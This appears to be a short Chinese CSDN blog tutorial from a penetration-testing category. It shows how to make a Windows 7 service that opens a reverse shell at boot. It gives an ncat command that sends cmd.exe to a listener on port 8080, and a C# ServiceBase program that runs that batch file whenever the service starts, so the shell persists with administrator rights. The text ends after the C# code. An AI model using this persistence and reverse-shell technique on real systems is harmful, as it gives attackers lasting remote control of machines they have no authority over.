创建一个服务，开机反弹shell。

haha13l4

于 2019-04-30 17:24:56 发布

阅读量523

点赞数

分类专栏：渗透测试 windows

本文链接：https://blog.csdn.net/haha13l4/article/details/89713272

版权

本文介绍了如何在Windows 7虚拟机上创建一个开机反弹shell服务。通过编写.bat和.cs文件，利用ncat和C#编译器生成.exe文件，并设置为系统服务，实现开机后自动反弹shell。实验结果显示，服务成功启动并以管理员权限连接到指定IP的8080端口。

摘要由CSDN通过智能技术生成

用虚拟机win7做服务器
需要编辑两个文件，我全放在C盘根目录下，可以随便放。
在这里插入图片描述
首先写一个反弹shell的批处理文件，如：.bat格式保存为www.bat
IP地址写你自己本机的IP，win7的ncat的存放路径

d:\\nmap\\ncat.exe 192.168.101.107 8080 -e C:\\windows\\system32\\cmd.exe

在这里插入图片描述
再用windows自带的工具将他编译成.exe文件
再编写一个文件保存.cs格式如：qqq.cs

using System.ServiceProcess;
 
namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start("C:\www.bat");
        }
    }
 
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}